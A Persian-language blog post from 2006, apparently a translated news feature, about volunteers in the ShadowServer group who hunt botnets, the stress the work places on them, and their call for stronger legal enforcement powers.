در اين كار، بار فشار رواني به افراد گروه تحميل مي‌شود؛ زيرا آن‌ها ساعت‌هاي متمادي از وقت خود را به صورت داوطلبانه صرف شكار دزدان و دادن اطلا‌عات آن‌ها به افراد يا مؤسساتي مي‌كنند كه كامپيوتر آن‌ها قرباني هكر‌ها شده است. اما اين زحمت آن‌ها در بيشتر مواقع پاسخي به دنبال ندارد.

ديويد تيلور، كارشناس ارشد امنيتي دانشگاه پنسيلوانيا، به خوبي از خستگي و سنگيني كار ناشي از شكار ‌botnet‌ها اطلاع دارد. وي پس از درج مطلبي در سايت واشنگتن‌پست‌ كه به گفت‌وگو با يك ‌‌botmaster به نام ‌‌‌Diabl0 اختصاص داشت، به گروه آلبرايت و ShadowServer دعوت شد. اين هكر كه به ازاي نصب هر ‌adware پولي دريافت مي‌كرده است، بعداً به اتهام اشاعه كرم ‌‌Zotob كه باعث آلودگي هزاران كامپيوتر گرديد دستگير شد.

چند ماه قبل، رديابي بوت‌نت عجيبي متشكل از كامپيوتر‌هايي با سيستم عامل ‌‌Mac OS X و لينوكس فكر تيلور را شديداً به خود مشغول كرده بود. او توانست با يك هفته كار مداوم، تقريباً تمامي ماشين‌هاي آلوده را موقعيت‌يابي كند و وضعيت را به صاحبان آن‌ها اعلام نمايد.اما يك ‌ISP تايواني كه هكرها از آن براي گسترش بوت‌نت خود استفاده مي‌كردند حاضر به پذيرش گفته‌‌هاي تيلور نشد.

از آن زمان، تيلور تصميم گرفت فعاليت خود را براي شكار دزدان كنار گذارد و به كار‌هايي بپردازد كه به انجام‌دادن آن‌ها بيشتر علاقمند است. در اين روز‌ها اوقات بيكاري او صرف كار كم استرس‌تري مي‌شود؛ يعني نقاشي.

او مي‌گويد: <اين كار تمام زندگي شخصي شما را تحت تأثير قرار مي‌دهد؛ زيرا براي موفق شدن بايد كاملاً بر كار مسلط شويد و اين، زمان زيادي مي‌برد و نه تنها آخر هفته، بلكه تمام هفته شما را پر مي‌كند. انجام‌دادن چنين كاري روحيه خاصي مي‌طلبد و... من افراد زيادي را با اين ويژگي نمي‌شناسم.>

از زماني كه رسانه‌‌هاي گروهي به پروژه ShadowServer توجه بيشتري كرد‌ه‌اند، تعداد افرادي كه به كارگيري حسگر‌هاي ‌honeynet و سهيم شدن در تلاش گروه علا‌قمند هستند رو به فزوني گذاشته است، اما آلبرايت از سوي ديگر نگران بوت‌نت‌هايي است كه در سال‌هاي آينده افزايش خواهد يافت. او مي‌گويد: <با وجود حسگر‌هايي كه در حال حاضر در حال كار داريم، هر هفته حدود بيست كد ‌bot ناشناخته پيدامي‌شود. در صورتي كه تعداد حسگر‌ها بيشتر شود، مسلماً بر تعداد كد‌هاي ناشناخته مكشوف نيز افزوده خواهد شد.>

آلبرايت مي‌گويد: <اگرچه قوانين جديد فدرال به برقراري ارتباط مؤثرتر با گروه‌هايي نظير ShadowServer تشويق نموده است، متأسفانه از بدنه اجرايي لازم براي استفاده از اطلاعاتي كه اين گروه‌ها تدارك مي‌بينند برخوردار نيست. داده‌‌هاي ما به خودي خود نمي‌توانند ضمانتي ايجاد كنند. در حالي كه آن‌ها خود بايد ترافيك شبكه را زير نظر داشته باشند. در مورد نوع و زمان نظارت نيز محدوديت دارند. اين وضع هر سال بدتر مي‌شود، ما به قوانين لازم‌الاجرايي نياز داريم كه باعث عملي شدن تصميمات گردد. متأسفانه در حال حاضر اين‌گونه نيست و كار‌هايي شبيه فعاليت‌هاي ما به بازي موش و گربه مي‌ماند؛ زيرا ما از نظر قانوني حق ثبت و ضبط تجهيزات و به زندان انداختن افراد خاطي را نداريم. در حالي كه براي حل مشكل به هر دو كار نياز است.
__________________
نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1385/09/15 ساعت 13:40 | لینک ثابت |

 


IRBCentral.com Banner Exchange

business articles